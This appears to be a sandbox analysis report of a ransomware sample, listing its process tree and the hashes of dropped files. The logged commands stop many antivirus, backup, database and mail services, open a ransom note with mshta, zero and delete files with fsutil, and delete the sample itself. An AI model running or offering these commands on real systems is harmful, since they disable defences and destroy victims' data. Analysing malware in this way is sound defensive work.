-
C:\Windows\SysWOW64\net.exe"net.exe" start upnphost /y2⤵PID:2220
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start Dnscache /y2⤵PID:3920
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵
- Blocklisted process makes network request
PID:11344
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:11268
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:11336
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:13516
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe2⤵PID:11620
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵PID:11208
-
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start FDResPub /y1⤵PID:4268
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y1⤵PID:4224
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y1⤵PID:4344
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y2⤵PID:14972
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y1⤵PID:4488
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y1⤵PID:4548
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y1⤵PID:4396
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SntpService /y1⤵PID:7752
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y1⤵PID:11420
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵PID:11740
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y1⤵PID:7980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y1⤵PID:7792
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y1⤵PID:12592
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y1⤵PID:13244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y1⤵PID:15132
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵PID:14956
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y1⤵PID:14988
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y1⤵PID:14964
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ntrtscan /y1⤵PID:14932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y1⤵PID:14940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y1⤵PID:14948
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y1⤵PID:14980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVService /y1⤵PID:14924
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y1⤵PID:14916
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y1⤵PID:14892
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y1⤵PID:14908
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y1⤵PID:14900
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y1⤵PID:14876
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y1⤵PID:14852
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵PID:14884
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y1⤵PID:14860
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ShMonitor /y1⤵PID:14868
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y1⤵PID:14836
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y1⤵PID:14828
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y1⤵PID:14840
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y1⤵PID:14820
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵PID:14812
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y1⤵PID:14804
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y1⤵PID:14796
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y1⤵PID:14788
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y1⤵PID:14780
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵PID:14772
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y1⤵PID:14764
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y1⤵PID:14628
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop tmlisten /y1⤵PID:14620
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵PID:14612
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISAdmin /y1⤵PID:14604
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y1⤵PID:14596
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵PID:14588
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y1⤵PID:14580
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y1⤵PID:14572
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y1⤵PID:14564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y1⤵PID:14556
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y1⤵PID:14548
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SepMasterService /y1⤵PID:14540
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y1⤵PID:14532
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y1⤵PID:14524
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y1⤵PID:14516
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵PID:14508
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AVP /y1⤵PID:14500
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y1⤵PID:14492
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y1⤵PID:14484
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵PID:14476
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL57 /y1⤵PID:14468
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵PID:14460
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y1⤵PID:14452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y1⤵PID:14444
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y1⤵PID:14436
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y1⤵PID:14428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y1⤵PID:14420
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵PID:14412
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵PID:14404
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y1⤵PID:14396
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SstpSvc /y1⤵PID:14388
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵PID:14380
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y1⤵PID:14372
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵PID:14364
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵PID:14356
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y1⤵PID:14348
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y1⤵PID:14340
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y1⤵PID:4392
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y1⤵PID:4932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y1⤵PID:4624
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y1⤵PID:4228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DCAgent /y1⤵PID:4248
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵PID:4820
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y1⤵PID:4872
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y1⤵PID:4488
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop POP3Svc /y1⤵PID:4560
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UI0Detect /y1⤵PID:2600
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop W3Svc /y1⤵PID:2220
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost /y2⤵PID:4124
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y1⤵PID:4520
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y1⤵PID:4716
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y1⤵PID:4628
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y1⤵PID:5048
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y1⤵PID:5104
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵PID:4868
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y1⤵PID:4808
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y1⤵PID:4892
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WRSVC /y1⤵PID:4036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵PID:14328
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y1⤵PID:14320
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL80 /y1⤵PID:14312
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y1⤵PID:14288
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y1⤵PID:14276
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y1⤵PID:14268
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ARSM /y1⤵PID:14260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Smcinst /y1⤵PID:14252
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y1⤵PID:14244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophossps /y1⤵PID:14236
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y1⤵PID:14228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y1⤵PID:14220
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SmcService /y1⤵PID:14212
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y1⤵PID:14204
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y1⤵PID:14188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y1⤵PID:14180
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_filter /y1⤵PID:14172
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y1⤵PID:14164
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y1⤵PID:14156
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_service /y1⤵PID:14148
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update /y1⤵PID:14140
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y1⤵PID:14132
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y1⤵PID:14124
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TmCCSF /y1⤵PID:14116
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y1⤵PID:14108
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y1⤵PID:14100
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y1⤵PID:14092
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKey /y1⤵PID:14084
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y1⤵PID:14076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y1⤵PID:14068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y1⤵PID:14060
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y1⤵PID:14052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y1⤵PID:14044
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y1⤵PID:14036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfevtp /y1⤵PID:14028
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfemms /y1⤵PID:14020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RESvc /y1⤵PID:14012
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y1⤵PID:14004
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y1⤵PID:13996
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y1⤵PID:13988
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y1⤵PID:13980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfefire /y1⤵PID:13972
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵PID:13956
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McTaskManager /y1⤵PID:13964
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McShield /y1⤵PID:13660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵PID:13652
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /1⤵PID:13644
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer /y1⤵PID:13636
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SamSs /y1⤵PID:13628
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y1⤵PID:13620
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Antivirus /y1⤵PID:13612
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y1⤵PID:13604
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y1⤵PID:13596
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y1⤵PID:13588
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y1⤵PID:13580
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y1⤵PID:13572
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y1⤵PID:13564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y1⤵PID:13556
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y1⤵PID:13548
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sacsvr /y1⤵PID:13540
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y1⤵PID:13532
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y1⤵PID:13524
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y1⤵PID:13516
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y1⤵PID:13508
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y1⤵PID:13500
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵PID:13488
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y1⤵PID:13480
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y1⤵PID:13472
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y1⤵PID:13464
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y1⤵PID:13456
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y1⤵PID:13448
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y1⤵PID:13440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y1⤵PID:13432
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y1⤵PID:13424
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y1⤵PID:13416
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y1⤵PID:13408
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y1⤵PID:13400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵PID:13392
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵PID:12316
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop macmnsvc /y1⤵PID:12308
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵PID:12300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y1⤵PID:12292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵PID:4124
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y1⤵PID:4668
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y1⤵PID:4380
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ESHASRV /y1⤵PID:11232
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y1⤵PID:11216
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y1⤵PID:11112
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SDRSVC /y1⤵PID:11096
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y1⤵PID:11036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y1⤵PID:10012
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBAMService /y1⤵PID:12280
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y1⤵PID:12272
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y1⤵PID:12256
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y1⤵PID:12240
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop masvc /y1⤵PID:12232
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y1⤵PID:9680
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub1⤵PID:6528
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost1⤵PID:6496
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ekrn /y1⤵PID:5400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y1⤵PID:5384
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y1⤵PID:3984
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y1⤵PID:5108
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y1⤵PID:4684
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Dnscache /y1⤵PID:1204
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:11008
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50f5cbdca905beb13bebdcf43fb0716bd
SHA19e136131389fde83297267faf6c651d420671b3f
SHA256a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060
SHA512a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0
-
Filesize
19KB
MD54bee6764158395ff4b8338d85a791fec
SHA195a27d8fb90f9a6f1a0249024031bbd12f70a6cc
SHA256597d2a3c92b0baadaeb50d970bef99507134d632a1926a6ac708b55c0f7af91d
SHA512ab08040bef2fc96bd9a9c4f5f471259033641114d80bbb9f439fc9fe6b3f37ba6cb65d1a9f216739b9f0906d1bf9ee615221b058f5e04666767aa4ebf15e9927
-
Filesize
2KB
MD53ba7dbb4ede0af8460784515c6eedf52
SHA1b017e44311d752fd4ffe1642e44d3cc0a5f783a8
SHA256437e29d7e40ad47e3f3be67610005fc1cc9b515778ad2898b6143fa670fb57e4
SHA51233dcb55d05038f2d96e6820d736590453dca59c30449486510cb88f2393616fd8c58c6639fecbe0156aebb1a9d88bd699d1a679bcd84e00b3ea08970e11b0ae9
-
Filesize
4KB
MD55b5092d4170180c338caaabcaff6ba72
SHA17c93ef3b4195d1cf0cfb69c66b3f91587ad6e58d
SHA2566b9a63a13de9fe2046759a2c7ab6c3ddb42fcea9f78de029b0cd1bc9756d130e
SHA512f9a3926344ed6292be1c53c1d3fa0669b0de4af2228b1f0910e510bb2cc3f3557ea8f7a0a84160770660278996bc18a7b19a3e451de3ba92a6e03bc02f39b0bf